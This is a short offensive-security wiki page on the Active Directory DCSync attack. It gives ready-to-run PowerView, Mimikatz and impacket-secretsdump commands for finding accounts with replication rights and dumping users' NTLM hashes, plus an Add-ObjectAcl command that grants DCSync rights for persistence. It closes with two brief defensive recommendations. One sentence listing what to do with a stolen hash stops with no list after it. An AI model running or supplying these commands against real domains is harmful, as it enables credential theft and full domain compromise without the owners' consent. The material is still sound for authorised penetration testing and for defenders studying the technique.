DCSync Attack

Table of contents

  1. Prerequisites
  2. Vulnerability
  3. Exploit
  4. Persistence
  5. Recommendations

Prerequisites

  • Domain account with Replicating Directory ChangesReplicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain AdminsEnterprise Admins, and Administrators groups have these rights assigned.

Vulnerability

A user who has domain permissions listed above can act like a Domain Controller and ask another Domain Controller to replicate Active Directory objects. It will use MS-DRSR protocol which can not be disabled. Therefore, if you manage to compromise such an account, you’ll be able to retrieve NTLM hash of any domain account.

Exploit

If you already compromised an initial low privileged account, you can enumerate domain users which can perform DCSync attacks by using BloodHound or PowerView.

# With PowerView from a domain joined computer.
Get-ObjectAcl -DistinguishedName "dc=$company,dc=$com" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

To obtain the NTLM hash of a single targeted user using a DCSync attack, use Mimikatz or impacket-secretsdump.

# From a domain joined Windows computer, with Mimikatz.
lsadump::dcsync /user:$domain\$target

# From Kali.
impacket-secretsdump -just-dc-user $target $domain/$username:$password@$dc_ip

You can also dump the entire NTDS.dit, but it’s less stealthy.

Once you get the NTLM hash of your target user, you can:

Persistence

If you are Domain Administrator, you can grant any domain user DCSync rights.

# From a domain joined computer with PowerView.
Add-ObjectAcl -TargetDistinguishedName "dc=$company,dc=$com" -PrincipalSamAccountName $username -Rights DCSync -Verbose

Recommendations

  • Disable Replicating Directory ChangesReplicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights for domain users who don’t need them.
  • Enforce EDR on Domain Controllers to detect and block DCSync attacks.